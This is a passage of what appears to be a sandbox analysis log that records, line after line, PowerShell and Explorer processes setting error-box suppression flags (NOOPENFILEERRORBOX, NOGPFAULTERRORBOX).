                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
